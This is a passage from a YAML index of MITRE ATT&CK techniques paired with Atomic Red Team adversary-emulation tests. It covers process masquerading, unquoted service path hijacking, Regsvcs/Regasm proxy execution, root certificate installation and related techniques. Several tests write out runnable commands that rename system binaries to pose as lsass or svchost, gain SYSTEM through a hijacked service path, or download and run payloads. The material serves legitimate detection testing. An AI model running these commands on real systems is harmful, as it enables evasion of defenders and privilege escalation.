x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
- Windows
x_mitre_version: '2.0'
identifier: T1036.003
atomic_tests:
- name: Masquerading as Windows LSASS process
auto_generated_guid: 5ba5a3d1-cf3c-4499-968a-a93155d1f717
description: |
Copies cmd.exe, renames it, and launches it to masquerade as an instance of lsass.exe.
Upon execution, cmd will be launched by powershell. If using Invoke-AtomicTest, The test will hang until the 120 second timeout cancels the session
supported_platforms:
- windows
executor:
command: |
copy %SystemRoot%\System32\cmd.exe %SystemRoot%\Temp\lsass.exe
%SystemRoot%\Temp\lsass.exe /B
cleanup_command: 'del /Q /F %SystemRoot%\Temp\lsass.exe >nul 2>&1
'
name: command_prompt
- name: Masquerading as FreeBSD or Linux crond process.
auto_generated_guid: a315bfff-7a98-403b-b442-2ea1b255e556
description: |
Copies sh process, renames it as crond, and executes it to masquerade as the cron daemon.
Upon successful execution, sh is renamed to `crond` and executed.
supported_platforms:
- linux
executor:
command: |
cp /bin/sh /tmp/crond;
echo 'sleep 5' | /tmp/crond
cleanup_command: 'rm /tmp/crond
'
name: sh
- name: Masquerading - cscript.exe running as notepad.exe
auto_generated_guid: 3a2a578b-0a01-46e4-92e3-62e2859b42f0
description: |
Copies cscript.exe, renames it, and launches it to masquerade as an instance of notepad.exe.
Upon successful execution, cscript.exe is renamed as notepad.exe and executed from non-standard path.
supported_platforms:
- windows
executor:
command: |
copy %SystemRoot%\System32\cscript.exe %APPDATA%\notepad.exe /Y
cmd.exe /c %APPDATA%\notepad.exe /B
cleanup_command: 'del /Q /F %APPDATA%\notepad.exe >nul 2>&1
'
name: command_prompt
- name: Masquerading - wscript.exe running as svchost.exe
auto_generated_guid: 24136435-c91a-4ede-9da1-8b284a1c1a23
description: |
Copies wscript.exe, renames it, and launches it to masquerade as an instance of svchost.exe.
Upon execution, no windows will remain open but wscript will have been renamed to svchost and ran out of the temp folder
supported_platforms:
- windows
dependency_executor_name: powershell
dependencies:
- description: 'Wscript file to execute must exist on disk
'
prereq_command: 'if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\T1036.003\src\T1036.003_masquerading.vbs")
{exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory (split-path "PathToAtomicsFolder\..\ExternalPayloads\T1036.003\src\T1036.003_masquerading.vbs") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1036.003/src/T1036.003_masquerading.vbs" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\T1036.003\src\T1036.003_masquerading.vbs"
executor:
command: |
copy %SystemRoot%\System32\wscript.exe %APPDATA%\svchost.exe /Y
cmd.exe /c %APPDATA%\svchost.exe "PathToAtomicsFolder\..\ExternalPayloads\T1036.003\src\T1036.003_masquerading.vbs"
cleanup_command: 'del /Q /F %APPDATA%\svchost.exe >nul 2>&1
'
name: command_prompt
- name: Masquerading - powershell.exe running as taskhostw.exe
auto_generated_guid: ac9d0fc3-8aa8-4ab5-b11f-682cd63b40aa
description: |
Copies powershell.exe, renames it, and launches it to masquerade as an instance of taskhostw.exe.
Upon successful execution, powershell.exe is renamed as taskhostw.exe and executed from non-standard path.
supported_platforms:
- windows
executor:
command: |
copy %windir%\System32\windowspowershell\v1.0\powershell.exe %APPDATA%\taskhostw.exe /Y
cmd.exe /K %APPDATA%\taskhostw.exe
cleanup_command: 'del /Q /F %APPDATA%\taskhostw.exe >nul 2>&1
'
name: command_prompt
- name: Masquerading - non-windows exe running as windows exe
auto_generated_guid: bc15c13f-d121-4b1f-8c7d-28d95854d086
description: |
Copies an exe, renames it as a windows exe, and launches it to masquerade as a real windows exe
Upon successful execution, powershell will execute T1036.003.exe as svchost.exe from on a non-standard path.
supported_platforms:
- windows
input_arguments:
outputfile:
description: path of file to execute
type: path
default: ($env:TEMP + "\svchost.exe")
inputfile:
description: path of file to copy
type: path
default: PathToAtomicsFolder\T1036.003\bin\T1036.003.exe
dependency_executor_name: powershell
dependencies:
- description: 'Exe file to copy must exist on disk at specified location (#{inputfile})
'
prereq_command: 'if (Test-Path "#{inputfile}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory (split-path "#{inputfile}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1036.003/bin/T1036.003.exe" -OutFile "#{inputfile}"
executor:
command: |
copy "#{inputfile}" #{outputfile}
try { $myT1036_003 = (Start-Process -PassThru -FilePath #{outputfile}).Id }
catch { $_; exit $_.Exception.HResult}
Stop-Process -ID $myT1036_003
cleanup_command: 'Remove-Item #{outputfile} -Force -ErrorAction Ignore
'
name: powershell
- name: Masquerading - windows exe running as different windows exe
auto_generated_guid: c3d24a39-2bfe-4c6a-b064-90cd73896cb0
description: 'Copies a windows exe, renames it as another windows exe, and launches
it to masquerade as second windows exe
'
supported_platforms:
- windows
input_arguments:
outputfile:
description: path of file to execute
type: path
default: ($env:TEMP + "\svchost.exe")
inputfile:
description: path of file to copy
type: path
default: "$env:ComSpec"
executor:
command: |
copy "#{inputfile}" #{outputfile}
$myT1036_003 = (Start-Process -PassThru -FilePath #{outputfile}).Id
Stop-Process -ID $myT1036_003
cleanup_command: 'Remove-Item #{outputfile} -Force -ErrorAction Ignore
'
name: powershell
- name: Malicious process Masquerading as LSM.exe
auto_generated_guid: 83810c46-f45e-4485-9ab6-8ed0e9e6ed7f
description: |
Detect LSM running from an incorrect directory and an incorrect service account
This works by copying cmd.exe to a file, naming it lsm.exe, then copying a file to the C:\ folder.
Upon successful execution, cmd.exe will be renamed as lsm.exe and executed from non-standard path.
supported_platforms:
- windows
executor:
command: |
copy C:\Windows\System32\cmd.exe C:\lsm.exe
C:\lsm.exe /c echo T1036.003 > C:\T1036.003.txt
cleanup_command: |
del C:\T1036.003.txt >nul 2>&1
del C:\lsm.exe >nul 2>&1
name: command_prompt
elevation_required: true
T1562.011:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--bef8aaee-961d-4359-a308-4c2182bcedff
created: '2023-03-14T16:04:24.865Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1562/011
external_id: T1562.011
- source_name: BlackBasta
description: Antonio Cocomazzi and Antonio Pirozzi. (2022, November 3). Black
Basta Ransomware | Attacks Deploy Custom EDR Evasion Tools Tied to FIN7
Threat Actor. Retrieved March 14, 2023.
url: https://www.sentinelone.com/labs/black-basta-ransomware-attacks-deploy-custom-edr-evasion-tools-tied-to-fin7-threat-actor/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-04-15T23:12:05.813Z'
name: Spoof Security Alerting
description: |-
Adversaries may spoof security alerting from tools, presenting false evidence to impair defenders’ awareness of malicious activity.(Citation: BlackBasta) Messages produced by defensive tools contain information about potential security events as well as the functioning status of security software and the system. Security reporting messages are important for monitoring the normal operation of a system and identifying important events that can signal a security incident.
Rather than or in addition to [Indicator Blocking](https://attack.mitre.org/techniques/T1562/006), an adversary can spoof positive affirmations that security tools are continuing to function even after legitimate security tools have been disabled (e.g., [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001)). An adversary can also present a “healthy” system status even after infection. This can be abused to enable further malicious activity by delaying defender responses.
For example, adversaries may show a fake Windows Security GUI and tray icon with a “healthy” system status after Windows Defender and other system tools have been disabled.(Citation: BlackBasta)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- macOS
- Linux
x_mitre_version: '1.0'
atomic_tests: []
T1574.009:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--bf96a5a3-3bce-43b7-8597-88545984c07b
created: '2020-03-13T13:51:58.519Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1574/009
external_id: T1574.009
- source_name: Windows Privilege Escalation Guide
description: absolomb. (2018, January 26). Windows Privilege Escalation Guide.
Retrieved August 10, 2018.
url: https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/
- source_name: Windows Unquoted Services
description: HackHappy. (2018, April 23). Windows Privilege Escalation – Unquoted
Services. Retrieved August 10, 2018.
url: https://securityboulevard.com/2018/04/windows-privilege-escalation-unquoted-services/
- source_name: Help eliminate unquoted path
description: Mark Baggett. (2012, November 8). Help eliminate unquoted path
vulnerabilities. Retrieved November 8, 2012.
url: https://isc.sans.edu/diary/Help+eliminate+unquoted+path+vulnerabilities/14464
- source_name: Microsoft CurrentControlSet Services
description: Microsoft. (2017, April 20). HKLM\SYSTEM\CurrentControlSet\Services
Registry Tree. Retrieved March 16, 2020.
url: https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:19.228Z'
name: 'Hijack Execution Flow: Path Interception by Unquoted Path'
description: |-
Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.
Service paths (Citation: Microsoft CurrentControlSet Services) and shortcut paths may also be vulnerable to path interception if the path has one or more spaces and is not surrounded by quotation marks (e.g., C:\unsafe path with space\program.exe vs. "C:\safe path with space\program.exe"). (Citation: Help eliminate unquoted path) (stored in Windows Registry keys) An adversary can place an executable in a higher level directory of the path, and Windows will resolve that executable instead of the intended executable. For example, if the path in a shortcut is C:\program files\myapp.exe, an adversary may create a program at C:\program.exe that will be run instead of the intended program. (Citation: Windows Unquoted Services) (Citation: Windows Privilege Escalation Guide)
This technique can be used for persistence if executables are called on a regular basis, as well as privilege escalation if intercepted executables are started by a higher privileged process.
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Stefan Kanthak
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.1'
identifier: T1574.009
atomic_tests:
- name: Execution of program.exe as service with unquoted service path
auto_generated_guid: 2770dea7-c50f-457b-84c4-c40a47460d9f
description: |
When a service is created whose executable path contains spaces and isn’t enclosed within quotes, leads to a vulnerability
known as Unquoted Service Path which allows a user to gain SYSTEM privileges.
In this case, if an executable program.exe in C:\ exists, C:\program.exe will be executed instead of test.exe in C:\Program Files\subfolder\test.exe.
supported_platforms:
- windows
input_arguments:
service_executable:
description: Path of the executable used for the service and as the hijacked
program.exe
type: path
default: PathToAtomicsFolder\T1574.009\bin\WindowsServiceExample.exe
executor:
command: |
copy "#{service_executable}" "C:\Program Files\windows_service.exe"
copy "#{service_executable}" "C:\program.exe"
sc create "Example Service" binpath= "C:\Program Files\windows_service.exe" Displayname= "Example Service" start= auto
sc start "Example Service"
cleanup_command: |
sc stop "Example Service" >nul 2>&1
sc delete "Example Service" >nul 2>&1
del "C:\Program Files\windows_service.exe" >nul 2>&1
del "C:\program.exe" >nul 2>&1
del "C:\Time.log" >nul 2>&1
name: command_prompt
elevation_required: true
T1027.003:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--c2e147a9-d1a8-4074-811a-d8789202d916
created: '2020-02-05T14:28:16.719Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1027/003
external_id: T1027.003
- source_name: McAfee Malicious Doc Targets Pyeongchang Olympics
description: Saavedra-Morales, J., Sherstobitoff, R. (2018, January 6). Malicious
Document Targets Pyeongchang Olympics. Retrieved April 10, 2018.
url: https://securingtomorrow.mcafee.com/mcafee-labs/malicious-document-targets-pyeongchang-olympics/
- source_name: Wikipedia Duqu
description: Wikipedia. (2017, December 29). Duqu. Retrieved April 10, 2018.
url: https://en.wikipedia.org/wiki/Duqu
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:20.395Z'
name: Steganography
description: "Adversaries may use steganography techniques in order to prevent
the detection of hidden information. Steganographic techniques can be used
to hide data in digital media such as images, audio tracks, video clips, or
text files.\n\n[Duqu](https://attack.mitre.org/software/S0038) was an early
example of malware that used steganography. It encrypted the gathered information
from a victim's system and hid it within an image before exfiltrating the
image to a C2 server.(Citation: Wikipedia Duqu) \n\nBy the end of 2017, a
threat group used Invoke-PSImage to hide [PowerShell](https://attack.mitre.org/techniques/T1059/001)
commands in an image file (.png) and execute the code on a victim's system.
In this particular case the [PowerShell](https://attack.mitre.org/techniques/T1059/001)
code downloaded another obfuscated script to gather intelligence from the
victim's machine and communicate it back to the adversary.(Citation: McAfee
Malicious Doc Targets Pyeongchang Olympics) "
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
- Windows
x_mitre_version: '1.2'
atomic_tests: []
T1550.004:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--c3c8c916-2f3c-4e71-94b2-240bdfc996f0
created: '2020-01-30T17:48:49.395Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1550/004
external_id: T1550.004
- source_name: Unit 42 Mac Crypto Cookies January 2019
description: Chen, Y., Hu, W., Xu, Z., et. al. (2019, January 31). Mac Malware
Steals Cryptocurrency Exchanges’ Cookies. Retrieved October 14, 2019.
url: https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/
- source_name: Pass The Cookie
description: Rehberger, J. (2018, December). Pivot to the Cloud using Pass
the Cookie. Retrieved April 5, 2019.
url: https://wunderwuzzi23.github.io/blog/passthecookie.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:20.943Z'
name: Web Session Cookie
description: |-
Adversaries can use stolen session cookies to authenticate to web applications and services. This technique bypasses some multi-factor authentication protocols since the session is already authenticated.(Citation: Pass The Cookie)
Authentication cookies are commonly used in web applications, including cloud-based services, after a user has authenticated to the service so credentials are not passed and re-authentication does not need to occur as frequently. Cookies are often valid for an extended period of time, even if the web application is not actively used. After the cookie is obtained through [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539) or [Web Cookies](https://attack.mitre.org/techniques/T1606/001), the adversary may then import the cookie into a browser they control and is then able to use the site or application as the user for as long as the session cookie is active. Once logged into the site, an adversary can access sensitive information, read email, or perform actions that the victim account has permissions to perform.
There have been examples of malware targeting session cookies to bypass multi-factor authentication systems.(Citation: Unit 42 Mac Crypto Cookies January 2019)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: lateral-movement
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Johann Rehberger
- Jack Burns, HubSpot
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- SaaS
- IaaS
- Office Suite
x_mitre_version: '1.5'
atomic_tests: []
T1078.002:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--c3d4bdd9-2cfe-4a80-9d0c-07a29ecdce8f
created: '2020-03-13T20:21:54.758Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1078/002
external_id: T1078.002
- source_name: TechNet Credential Theft
description: Microsoft. (2016, April 15). Attractive Accounts for Credential
Theft. Retrieved June 3, 2016.
url: https://technet.microsoft.com/en-us/library/dn535501.aspx
- source_name: TechNet Audit Policy
description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
June 3, 2016.
url: https://technet.microsoft.com/en-us/library/dn487457.aspx
- source_name: Microsoft AD Accounts
description: Microsoft. (2019, August 23). Active Directory Accounts. Retrieved
March 13, 2020.
url: https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/active-directory-accounts
- source_name: Ubuntu SSSD Docs
description: Ubuntu. (n.d.). SSSD. Retrieved September 23, 2021.
url: https://ubuntu.com/server/docs/service-sssd
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:21.034Z'
name: Domain Accounts
description: |-
Adversaries may obtain and abuse credentials of a domain account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion.(Citation: TechNet Credential Theft) Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover users, administrators, and services.(Citation: Microsoft AD Accounts)
Adversaries may compromise domain accounts, some with a high level of privileges, through various means such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or password reuse, allowing access to privileged resources of the domain.
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Jon Sternstein, Stern Security
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- ESXi
- Linux
- macOS
- Windows
x_mitre_version: '1.5'
atomic_tests: []
T1218.009:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--c48a67ee-b657-45c1-91bf-6cdbe27205f8
created: '2020-01-23T19:42:16.439Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1218/009
external_id: T1218.009
- source_name: MSDN Regsvcs
description: Microsoft. (n.d.). Regsvcs.exe (.NET Services Installation Tool).
Retrieved July 1, 2016.
url: https://msdn.microsoft.com/en-us/library/04za0hca.aspx
- source_name: MSDN Regasm
description: Microsoft. (n.d.). Regasm.exe (Assembly Registration Tool). Retrieved
July 1, 2016.
url: https://msdn.microsoft.com/en-us/library/tzat5yw6.aspx
- source_name: LOLBAS Regsvcs
description: LOLBAS. (n.d.). Regsvcs.exe. Retrieved July 31, 2019.
url: https://lolbas-project.github.io/lolbas/Binaries/Regsvcs/
- source_name: LOLBAS Regasm
description: LOLBAS. (n.d.). Regasm.exe. Retrieved July 31, 2019.
url: https://lolbas-project.github.io/lolbas/Binaries/Regasm/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:21.181Z'
name: 'Signed Binary Proxy Execution: Regsvcs/Regasm'
description: |-
Adversaries may abuse Regsvcs and Regasm to proxy execution of code through a trusted Windows utility. Regsvcs and Regasm are Windows command-line utilities that are used to register .NET [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) assemblies. Both are binaries that may be digitally signed by Microsoft. (Citation: MSDN Regsvcs) (Citation: MSDN Regasm)
Both utilities may be used to bypass application control through use of attributes within the binary to specify code that should be run before registration or unregistration: [ComRegisterFunction] or [ComUnregisterFunction] respectively. The code with the registration and unregistration attributes will be executed even if the process is run under insufficient privileges and fails to execute. (Citation: LOLBAS Regsvcs)(Citation: LOLBAS Regasm)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Casey Smith
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1218.009
atomic_tests:
- name: Regasm Uninstall Method Call Test
auto_generated_guid: 71bfbfac-60b1-4fc0-ac8b-2cedbbdcb112
description: 'Executes the Uninstall Method, No Admin Rights Required. Upon
execution, "I shouldn''t really execute either." will be displayed.
'
supported_platforms:
- windows
input_arguments:
output_file:
description: Location of the payload
type: path
default: "%tmp%\\T1218.009.dll"
source_file:
description: Location of the CSharp source_file
type: path
default: PathToAtomicsFolder\T1218.009\src\T1218.009.cs
dependency_executor_name: powershell
dependencies:
- description: 'The CSharp source file must exist on disk at specified location
(#{source_file})
'
prereq_command: 'if (Test-Path "#{source_file}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory (split-path "#{source_file}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.009/src/T1218.009.cs" -OutFile "#{source_file}"
executor:
command: |
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /out:"#{output_file}" /target:library "#{source_file}"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U #{output_file}
cleanup_command: 'del #{output_file} >nul 2>&1
'
name: command_prompt
- name: Regsvcs Uninstall Method Call Test
auto_generated_guid: fd3c1c6a-02d2-4b72-82d9-71c527abb126
description: |
Executes the Uninstall Method, No Admin Rights Required, Requires SNK. Upon execution, "I shouldn't really execute" will be displayed
along with other information about the assembly being installed.
supported_platforms:
- windows
input_arguments:
output_file:
description: Location of the payload
type: path
default: "$Env:TEMP\\T1218.009.dll"
source_file:
description: Location of the CSharp source_file
type: path
default: PathToAtomicsFolder\T1218.009\src\T1218.009.cs
dependency_executor_name: powershell
dependencies:
- description: 'The CSharp source file must exist on disk at specified location
(#{source_file})
'
prereq_command: 'if (Test-Path "#{source_file}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory (split-path "#{source_file}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.009/src/T1218.009.cs" -OutFile "#{source_file}"
executor:
command: |
$key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4='
$Content = [System.Convert]::FromBase64String($key)
Set-Content $env:Temp\key.snk -Value $Content -Encoding Byte
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /out:"#{output_file}" /target:library /keyfile:$env:Temp\key.snk #{source_file}
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe #{output_file}
cleanup_command: |
Remove-Item #{output_file} -ErrorAction Ignore | Out-Null
$parentpath = Split-Path -Path "#{output_file}"
Remove-Item $parentpath\key.snk -ErrorAction Ignore | Out-Null
Remove-Item $parentpath\T1218.009.tlb -ErrorAction Ignore | Out-Null
name: powershell
elevation_required: true
T1553.004:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--c615231b-f253-4f58-9d47-d5b4cbdb6839
created: '2020-02-21T21:05:32.844Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1553/004
external_id: T1553.004
- source_name: Operation Emmental
description: 'botconf eu. (2014, December 31). David Sancho - Finding Holes
in Banking 2FA: Operation Emmental. Retrieved January 4, 2024.'
url: https://www.youtube.com/watch?v=gchKFumYHWc
- source_name: SpectorOps Code Signing Dec 2017
description: Graeber, M. (2017, December 22). Code Signing Certificate Cloning
Attacks and Defenses. Retrieved April 3, 2018.
url: https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec
- source_name: Kaspersky Superfish
description: 'Onuma. (2015, February 24). Superfish: Adware Preinstalled on
Lenovo Laptops. Retrieved February 20, 2017.'
url: https://www.kaspersky.com/blog/lenovo-pc-with-adware-superfish-preinstalled/7712/
- source_name: objective-see ay mami 2018
description: Patrick Wardle. (2018, January 11). Ay MaMi. Retrieved March
19, 2018.
url: https://objective-see.com/blog/blog_0x26.html
- source_name: Microsoft Sigcheck May 2017
description: Russinovich, M. et al.. (2017, May 22). Sigcheck. Retrieved April
3, 2018.
url: https://docs.microsoft.com/sysinternals/downloads/sigcheck
- source_name: Tripwire AppUNBlocker
description: 'Smith, T. (2016, October 27). AppUNBlocker: Bypassing AppLocker.
Retrieved December 19, 2017.'
url: https://www.tripwire.com/state-of-security/off-topic/appunblocker-bypassing-applocker/
- source_name: Wikipedia Root Certificate
description: Wikipedia. (2016, December 6). Root certificate. Retrieved February
20, 2017.
url: https://en.wikipedia.org/wiki/Root_certificate
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:21.832Z'
name: 'Subvert Trust Controls: Install Root Certificate'
description: |-
Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate.(Citation: Wikipedia Root Certificate) Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.
Installation of a root certificate on a compromised system would give an adversary a way to degrade the security of that system. Adversaries have used this technique to avoid security warnings prompting users when compromised systems connect over HTTPS to adversary controlled web servers that spoof legitimate websites in order to collect login credentials.(Citation: Operation Emmental)
Atypical root certificates have also been pre-installed on systems by the manufacturer or in the software supply chain and were used in conjunction with malware/adware to provide [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) capability for intercepting information transmitted over secure TLS/SSL communications.(Citation: Kaspersky Superfish)
Root certificates (and their associated chains) can also be cloned and reinstalled. Cloned certificate chains will carry many of the same metadata characteristics of the source and can be used to sign malicious code that may then bypass signature validation tools (ex: Sysinternals, antivirus, etc.) used to block execution and/or uncover artifacts of Persistence.(Citation: SpectorOps Code Signing Dec 2017)
In macOS, the Ay MaMi malware uses /usr/bin/security add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain /path/to/malicious/cert to install a malicious certificate as a trusted root certificate into the system keychain.(Citation: objective-see ay mami 2018)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Matt Graeber, @mattifestation, SpecterOps
- Red Canary
- Travis Smith, Tripwire
- Itzik Kotler, SafeBreach
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
- Windows
x_mitre_version: '1.3'
identifier: T1553.004
atomic_tests:
- name: Install root CA on CentOS/RHEL
auto_generated_guid: 9c096ec4-fd42-419d-a762-d64cc950627e
description: 'Creates a root CA with openssl
'
supported_platforms:
- linux
input_arguments:
cert_filename:
description: Path of the CA certificate we create
type: path
default: rootCA.crt
key_filename:
description: Key we create that is used to create the CA certificate
type: path
default: rootCA.key
executor:
command: |
openssl genrsa -out #{key_filename} 4096
